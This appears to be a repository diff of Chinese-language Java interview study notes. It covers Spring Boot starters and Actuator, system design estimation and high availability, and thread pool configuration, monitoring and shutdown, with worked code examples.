**1. 创建 autoconfigure 模块**
```java
@Configuration
@ConditionalOnClass(HelloService.class)
@EnableConfigurationProperties(HelloProperties.class)
public class HelloAutoConfiguration {
@Bean
@ConditionalOnMissingBean
public HelloService helloService(HelloProperties properties) {
return new HelloService(properties.getMessage());
}
}
```
**2. 创建配置类**
```java
@ConfigurationProperties(prefix = "hello")
public class HelloProperties {
private String message = "Hello World";
// getter/setter
}
```
**3. 创建 spring.factories**
```properties
# META-INF/spring.factories
org.springframework.boot.autoconfigure.EnableAutoConfiguration=\
com.example.hello.HelloAutoConfiguration
```
**4. 使用**
```yaml
# application.yml
hello:
message: Hello Spring Boot
```
```java
@Autowired
private HelloService helloService;
helloService.sayHello(); // 输出Hello Spring Boot
```
---
### 6. Actuator 监控
#### **依赖**
```xml
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-actuator</artifactId>
</dependency>
```
---
#### **配置**
```yaml
management:
endpoints:
web:
exposure:
include: health,info,metrics,prometheus # 暴露端点
endpoint:
health:
show-details: always # 显示详细信息
```
---
#### **常用端点**
| 端点 | 说明 | 示例 |
|------|------|------|
| **/actuator/health** | 健康检查 | `{"status":"UP"}` |
| **/actuator/info** | 应用信息 | 版本、描述等 |
| **/actuator/metrics** | 指标 | JVM、HTTP 请求等 |
| **/actuator/prometheus** | Prometheus 格式 | 监控数据 |
| **/actuator/env** | 环境变量 | 配置属性 |
| **/actuator/loggers** | 日志配置 | 日志级别 |
---
#### **自定义健康检查**
```java
@Component
public class DatabaseHealthIndicator implements HealthIndicator {
@Autowired
private DataSource dataSource;
@Override
public Health health() {
try (Connection conn = dataSource.getConnection()) {
if (conn.isValid(1)) {
return Health.up()
.withDetail("database", "MySQL")
.build();
}
} catch (SQLException e) {
return Health.down()
.withException(e)
.build();
}
}
}
```
---
### 7. 阿里 P7 加分项
**深度理解**
- 理解 Spring Boot 的条件装配机制
- 理解 SpringApplication 的启动流程
- 理解 AutoConfigurationImportSelector 的工作原理
**实战经验**
- 有自定义 Starter 的经验
- 有解决自动配置冲突的经验
- 有 Spring Boot 性能优化的经验
**架构能力**
- 能设计可复用的 Spring Boot Starter
- 能设计多环境配置方案
- 能设计微服务监控体系
**技术选型**
- 了解 Spring Boot 2.x vs 3.x 的区别
- 了解 GraalVM Native Image 的支持
- 了解 Quarkus、Micronaut 等替代框架

166
questions/system-design-general.md Normal file
View File

@@ -0,0 +1,166 @@
# 系统设计方法论
## 问题
1. 系统设计的核心原则是什么?
2. 如何进行需求分析?
3. 如何估算系统容量?
4. 数据模型设计有哪些最佳实践?
5. 如何设计高可用架构?
---
## 标准答案
### 1. 系统设计原则
**核心原则**
1. **简单性**KISSKeep It Simple, Stupid
2. **模块化**(高内聚、低耦合)
3. **可扩展性**(水平扩展、垂直扩展)
4. **高可用性**(冗余、故障隔离)
5. **一致性**CAP 理论权衡)
---
### 2. 需求分析
**功能需求**
- 系统做什么?
- 用户角色有哪些?
- 核心流程是什么?
**非功能需求**
- **性能**QPS、响应时间
- **可用性**99.9%、99.99%、99.999%
- **扩展性**:支持多少用户
- **安全性**:认证、授权、加密
- **一致性**:强一致、最终一致
---
### 3. 容量估算
**QPS 估算**
```
日活用户DAU100 万
平均每人每天请求20 次
总 QPS = 100 万 × 20 / 86400 ≈ 231 QPS
峰值 QPS = 231 × 5 ≈ 1155 QPS假设峰值是平均的 5 倍)
```
**存储估算**
```
用户数100 万
每人平均数据1 KB
总存储 = 100 万 × 1 KB ≈ 1 GB
每年增长 = 1 GB × 12 = 12 GB
```
**带宽估算**
```
平均响应大小10 KB
QPS1000
带宽 = 1000 × 10 KB × 8 = 80 Mbps
```
---
### 4. 数据模型设计
**原则**
1. **范式化**(减少冗余)
2. **反范式化**(提高性能)
3. **分区**(水平、垂直)
4. **索引**(加速查询)
**示例**
```sql
-- 范式化3NF
CREATE TABLE users (
id BIGINT PRIMARY KEY,
name VARCHAR(50),
email VARCHAR(100)
);
CREATE TABLE orders (
id BIGINT PRIMARY KEY,
user_id BIGINT,
amount DECIMAL(10,2),
created_at DATETIME,
FOREIGN KEY (user_id) REFERENCES users(id)
);
-- 反范式化(冗余用户名,避免 JOIN
CREATE TABLE orders_denormalized (
id BIGINT PRIMARY KEY,
user_id BIGINT,
user_name VARCHAR(50), -- 冗余
amount DECIMAL(10,2),
created_at DATETIME
);
```
---
### 5. 高可用架构
**冗余设计**
```
┌─────────────┐
│ 负载均衡 │ (Nginx、HAProxy)
└──────┬──────┘
┌─────────┼─────────┐
│ │ │
┌──▼──┐ ┌──▼──┐ ┌──▼──┐
│App 1│ │App 2│ │App 3│
└──┬──┘ └──┬──┘ └──┬──┘
│ │ │
└─────────┼─────────┘
┌──────▼──────┐
│ 主从数据库 │
│ Master │
│ Slave │
└─────────────┘
```
**故障隔离**
- 熔断器Circuit Breaker
- 限流Rate Limiter
- 降级Fallback
- 舱舱模式Bulkhead
---
### 6. 扩展性设计
**垂直扩展Scale Up**
- 升级硬件CPU、内存、磁盘
- 简单、快速
- 有上限(硬件限制)
**水平扩展Scale Out**
- 增加机器数量
- 无限扩展
- 需要架构支持(无状态、数据分片)
---
### 7. 阿里 P7 加分项
**架构思维**
- 能进行技术选型(权衡各种方案)
- 能进行容量规划(预估资源需求)
- 能进行成本控制(性价比优化)
**设计能力**
- 能设计高并发架构
- 能设计高可用架构
- 能设计可扩展架构
**沟通能力**
- 能清晰地表达设计方案
- 能进行技术方案评审
- 能推动方案落地

600
questions/thread-pool-params.md Normal file
View File

@@ -0,0 +1,600 @@
# 线程池核心参数详解
## 问题
1. 线程池的核心参数有哪些?各自的作用是什么?
2. 如何合理设置线程池大小?
3. 线程池的拒绝策略有哪些?如何自定义?
4. 线程池如何优雅关闭?
5. 线程池的监控指标有哪些?
6. 在实际项目中如何使用线程池?
---
## 标准答案
### 1. 线程池核心参数
#### **ThreadPoolExecutor 构造函数**
```java
public ThreadPoolExecutor(
int corePoolSize, // 核心线程数
int maximumPoolSize, // 最大线程数
long keepAliveTime, // 非核心线程空闲存活时间
TimeUnit unit, // 时间单位
BlockingQueue<Runnable> workQueue, // 任务队列
ThreadFactory threadFactory, // 线程工厂
RejectedExecutionHandler handler // 拒绝策略
)
```
---
#### **参数详解**
**1. corePoolSize核心线程数**
- **说明**:即使空闲也保留的线程数
- **默认值**:创建时无核心线程(任务到达时才创建)
- **预热**`prestartAllCoreThreads()` 提前创建核心线程
```java
ThreadPoolExecutor executor = new ThreadPoolExecutor(
10, // 核心线程数
20, // 最大线程数
...
);
// 预热核心线程
executor.prestartAllCoreThreads();
```
---
**2. maximumPoolSize最大线程数**
- **说明**:线程池允许的最大线程数
- **限制**`maximumPoolSize >= corePoolSize`
- **动态调整**:运行时可通过 `setMaximumPoolSize()` 调整
```java
// 动态调整最大线程数
executor.setMaximumPoolSize(50);
```
---
**3. keepAliveTime非核心线程存活时间**
- **说明**:非核心线程的空闲存活时间
- **超时回收**:超过时间后,线程会被回收
- **允许回收核心线程**`allowCoreThreadTimeOut(true)`
```java
ThreadPoolExecutor executor = new ThreadPoolExecutor(
10,
20,
60, // 存活时间
TimeUnit.SECONDS,
new LinkedBlockingQueue<>(100)
);
// 允许核心线程超时回收
executor.allowCoreThreadTimeOut(true);
```
---
**4. workQueue任务队列**
**常见队列**
| 队列 | 特性 | 适用场景 |
|------|------|----------|
| **SynchronousQueue** | 不存储,直接传递 | 高并发、低延迟 |
| **LinkedBlockingQueue** | 无界队列(默认 Integer.MAX_VALUE | 任务提交频繁 |
| **ArrayBlockingQueue** | 有界队列 | 防止资源耗尽 |
| **PriorityBlockingQueue** | 优先级队列 | 优先级任务 |
**示例**
```java
// 1. SynchronousQueue高并发
ExecutorService executor1 = new ThreadPoolExecutor(
10, 20,
60L, TimeUnit.SECONDS,
new SynchronousQueue<Runnable>() // 无队列,直接传递
);
// 2. LinkedBlockingQueue无界
ExecutorService executor2 = new ThreadPoolExecutor(
10, 20,
60L, TimeUnit.SECONDS,
new LinkedBlockingQueue<>(1000) // 队列长度 1000
);
// 3. PriorityBlockingQueue优先级
ExecutorService executor3 = new ThreadPoolExecutor(
10, 20,
60L, TimeUnit.SECONDS,
new PriorityBlockingQueue<>(100)
);
```
---
**5. threadFactory线程工厂**
**作用**
- 设置线程名称(便于排查)
- 设置线程优先级
- 设置是否为守护线程
**示例**
```java
ThreadFactory namedThreadFactory = new ThreadFactoryBuilder()
.setNameFormat("order-pool-%d") // 线程名称前缀
.setDaemon(false) // 非守护线程
.setPriority(Thread.NORM_PRIORITY)
.build();
ThreadPoolExecutor executor = new ThreadPoolExecutor(
10, 20,
60L, TimeUnit.SECONDS,
new LinkedBlockingQueue<>(100),
namedThreadFactory
);
```
---
**6. handler拒绝策略**
**内置策略**
| 策略 | 说明 |
|------|------|
| **AbortPolicy默认** | 抛出异常 |
| **CallerRunsPolicy** | 调用者线程执行 |
| **DiscardPolicy** | 静默丢弃 |
| **DiscardOldestPolicy** | 丢弃最旧的任务 |
```java
// 自定义拒绝策略
RejectedExecutionHandler handler = new RejectedExecutionHandler() {
@Override
public void rejectedExecution(Runnable r, ThreadPoolExecutor executor) {
// 记录日志
log.warn("任务被拒绝: {}", r);
// 重试(加入队列等待)
if (!executor.isShutdown()) {
try {
executor.getQueue().put(r);
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
}
}
}
};
ThreadPoolExecutor executor = new ThreadPoolExecutor(
10, 20,
60L, TimeUnit.SECONDS,
new LinkedBlockingQueue<>(100),
handler
);
```
---
### 2. 线程池工作流程
```
任务提交
核心线程数 < corePoolSize
├─ 是 → 创建核心线程并执行
└─ 否 → 继续
队列未满?
├─ 是 → 加入队列
└─ 否 → 继续
线程数 < maximumPoolSize
├─ 是 → 创建非核心线程并执行
└─ 否 → 继续
拒绝策略
```
---
### 3. 合理设置线程池大小
#### **CPU 密集型任务**
**特点**:主要消耗 CPU 资源(计算、加密)
**公式**
```
线程数 = CPU 核心数 + 1
```
**原因**
- CPU 密集型任务不需要太多线程
- +1 是为了当某线程因页故障等原因暂停时CPU 不会闲置
**示例**
```java
int cpuCore = Runtime.getRuntime().availableProcessors(); // 8
int poolSize = cpuCore + 1; // 9
ThreadPoolExecutor executor = new ThreadPoolExecutor(
poolSize, // 核心线程数
poolSize, // 最大线程数
0L, TimeUnit.MILLISECONDS,
new LinkedBlockingQueue<>(100)
);
```
---
#### **IO 密集型任务**
**特点**:主要等待 IO网络、磁盘
**公式**
```
线程数 = CPU 核心数 × (1 + IO 耗时 / CPU 耗时)
```
**示例**
```java
// IO 耗时 / CPU 耗时 = 2IO 占 2/3CPU 占 1/3
int cpuCore = Runtime.getRuntime().availableProcessors(); // 8
int poolSize = cpuCore * (1 + 2); // 24
ThreadPoolExecutor executor = new ThreadPoolExecutor(
cpuCore, // 核心线程数 = CPU 核心数
poolSize, // 最大线程数
60L, TimeUnit.SECONDS,
new LinkedBlockingQueue<>(500)
);
```
---
#### **通用公式**
```
线程数 = CPU 核心数 × 目标 CPU 使用率 × (1 + IO 耗时 / CPU 耗时)
```
**参数调整**
- 目标 CPU 使用率80% - 90%
- IO / CPU 比例:通过压测获得
---
### 4. 线程池监控
#### **监控指标**
| 指标 | 说明 | 获取方法 |
|------|------|----------|
| **活跃线程数** | 正在执行任务的线程数 | `getActiveCount()` |
| **已完成任务数** | 历史完成的任务总数 | `getCompletedTaskCount()` |
| **总任务数** | 已完成 + 正在执行 | `getTaskCount()` |
| **队列大小** | 队列中待执行任务数 | `getQueue().size()` |
| **最大线程数** | 历史最大线程数 | `getLargestPoolSize()` |
| **线程池是否关闭** | `isShutdown()` | `isShutdown()` |
---
#### **监控代码**
```java
@Component
public class ThreadPoolMonitor {
@Autowired
private Map<String, ThreadPoolExecutor> executorMap;
@Scheduled(fixedRate = 60000) // 每分钟
public void monitor() {
executorMap.forEach((name, executor) -> {
ThreadPoolExecutorStats stats = new ThreadPoolExecutorStats();
stats.setName(name);
stats.setCorePoolSize(executor.getCorePoolSize());
stats.setMaximumPoolSize(executor.getMaximumPoolSize());
stats.setActiveCount(executor.getActiveCount());
stats.setCompletedTaskCount(executor.getCompletedTaskCount());
stats.setTaskCount(executor.getTaskCount());
stats.setQueueSize(executor.getQueue().size());
stats.setLargestPoolSize(executor.getLargestPoolSize());
// 上报到监控系统Prometheus、Grafana
Metrics.report(stats);
// 告警判断
if (executor.getActiveCount() >= executor.getMaximumPoolSize() * 0.8) {
alert("线程池 " + name + " 负载过高");
}
});
}
}
```
---
#### **Actuator 监控Spring Boot**
**依赖**
```xml
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-actuator</artifactId>
</dependency>
```
**配置**
```yaml
management:
endpoints:
web:
exposure:
include: health,info,metrics
metrics:
export:
prometheus:
enabled: true
```
**访问**
```bash
curl http://localhost:8080/actuator/metrics
curl http://localhost:8080/actuator/metrics/executor.pool.size
```
---
### 5. 线程池优雅关闭
#### **问题**
不优雅关闭的后果:
- 已提交的任务可能丢失
- 正在执行的任务可能被中断
---
#### **shutdown()**
```java
executor.shutdown();
try {
// 等待任务完成
if (!executor.awaitTermination(60, TimeUnit.SECONDS)) {
// 超时,强制关闭
executor.shutdownNow();
}
} catch (InterruptedException e) {
executor.shutdownNow();
Thread.currentThread().interrupt();
}
```
**特点**
- 不再接受新任务
- 等待已提交的任务完成
- 超时后可调用 `shutdownNow()` 强制关闭
---
#### **shutdownNow()**
```java
List<Runnable> unfinishedTasks = executor.shutdownNow();
```
**特点**
- 不再接受新任务
- 尝试停止正在执行的任务(通过 `Thread.interrupt()`
- 返回未执行的任务列表
---
### 6. Spring 线程池配置
#### **配置类**
```java
@Configuration
public class ThreadPoolConfig {
@Bean("orderThreadPool")
public ThreadPoolExecutor orderThreadPool() {
return new ThreadPoolExecutor(
10, // 核心线程数
20, // 最大线程数
60L, TimeUnit.SECONDS,
new LinkedBlockingQueue<>(100),
new ThreadFactoryBuilder()
.setNameFormat("order-pool-%d")
.build(),
new ThreadPoolExecutor.CallerRunsPolicy()
);
}
@Bean("emailThreadPool")
public ThreadPoolExecutor emailThreadPool() {
return new ThreadPoolExecutor(
5,
10,
60L, TimeUnit.SECONDS,
new LinkedBlockingQueue<>(50),
new ThreadFactoryBuilder()
.setNameFormat("email-pool-%d")
.build(),
new ThreadPoolExecutor.CallerRunsPolicy()
);
}
}
```
---
#### **使用**
```java
@Service
public class OrderService {
@Autowired
@Qualifier("orderThreadPool")
private ThreadPoolExecutor orderThreadPool;
public void createOrder(Order order) {
// 异步处理
orderThreadPool.execute(() -> {
// 处理订单
processOrder(order);
});
}
}
```
---
#### **@AsyncSpring 异步)**
**配置**
```java
@Configuration
@EnableAsync
public class AsyncConfig {
@Bean("asyncExecutor")
public Executor asyncExecutor() {
ThreadPoolTaskExecutor executor = new ThreadPoolTaskExecutor();
executor.setCorePoolSize(10);
executor.setMaxPoolSize(20);
executor.setQueueCapacity(100);
executor.setThreadNamePrefix("async-pool-");
executor.setRejectedExecutionHandler(new ThreadPoolExecutor.CallerRunsPolicy());
executor.initialize();
return executor;
}
}
```
**使用**
```java
@Service
public class EmailService {
@Async("asyncExecutor")
public void sendEmail(String to, String subject, String body) {
// 异步发送邮件
mailSender.send(to, subject, body);
}
}
```
---
### 7. 实际项目经验
#### **案例 1线程池参数调优**
**问题**
- 订单接口响应慢
- CPU 使用率低30%),线程池队列满
**分析**
```java
// 原配置
corePoolSize = 5
maximumPoolSize = 10
queue = LinkedBlockingQueue(100)
```
**问题**
- 线程数太少,任务堆积在队列
- 数据库连接池用满,等待连接
**优化**
```java
// 优化后配置
corePoolSize = 20 // 增加
maximumPoolSize = 50 // 增加
queue = LinkedBlockingQueue(500) // 增加
```
**结果**:响应时间从 2s 降至 200ms
---
#### **案例 2动态线程池**
**需求**:根据流量动态调整线程池大小
**实现**
```java
@Component
public class DynamicThreadPoolManager {
private final Map<String, ThreadPoolExecutor> executorMap = new ConcurrentHashMap<>();
@PostConstruct
public void init() {
// 定时调整线程池大小
ScheduledExecutorService scheduler = Executors.newSingleThreadScheduledExecutor();
scheduler.scheduleAtFixedRate(this::adjustThreadPoolSize, 1, 1, TimeUnit.MINUTES);
}
private void adjustThreadPoolSize() {
executorMap.forEach((name, executor) -> {
// 获取当前负载
int activeCount = executor.getActiveCount();
int maximumPoolSize = executor.getMaximumPoolSize();
// 负载 > 80%,扩容
if (activeCount > maximumPoolSize * 0.8) {
int newSize = Math.min(maximumPoolSize * 2, 100);
executor.setMaximumPoolSize(newSize);
log.info("扩容线程池: {} -> {}", name, newSize);
}
// 负载 < 20%,缩容
else if (activeCount < maximumPoolSize * 0.2) {
int newSize = Math.max(maximumPoolSize / 2, executor.getCorePoolSize());
executor.setMaximumPoolSize(newSize);
log.info("缩容线程池: {} -> {}", name, newSize);
}
});
}
}
```
---
### 8. 阿里 P7 加分项
**深度理解**
- 理解线程池的状态转换RUNNING、SHUTDOWN、STOP、TIDYING、TERMINATED
- 理解 `Worker` 的实现原理(继承 AQS、实现 Runnable
- 理解线程池的异常处理机制
**实战经验**
- 有线程池参数调优的经验
- 有处理线程池饱和问题的经验
- 有线程池监控和告警的经验
**架构能力**
- 能设计动态线程池(根据流量调整)
- 能设计线程池隔离(不同业务独立线程池)
- 能设计线程池监控体系
**技术选型**
- 了解 `ForkJoinPool`(工作窃取线程池)
- 了解 `ScheduledThreadPoolExecutor`(定时任务线程池)
- 了解 `Vert.x`、WebFlux 等响应式框架的线程模型

1514
questions/transaction-isolation.md Normal file
View File

File diff suppressed because it is too large Load Diff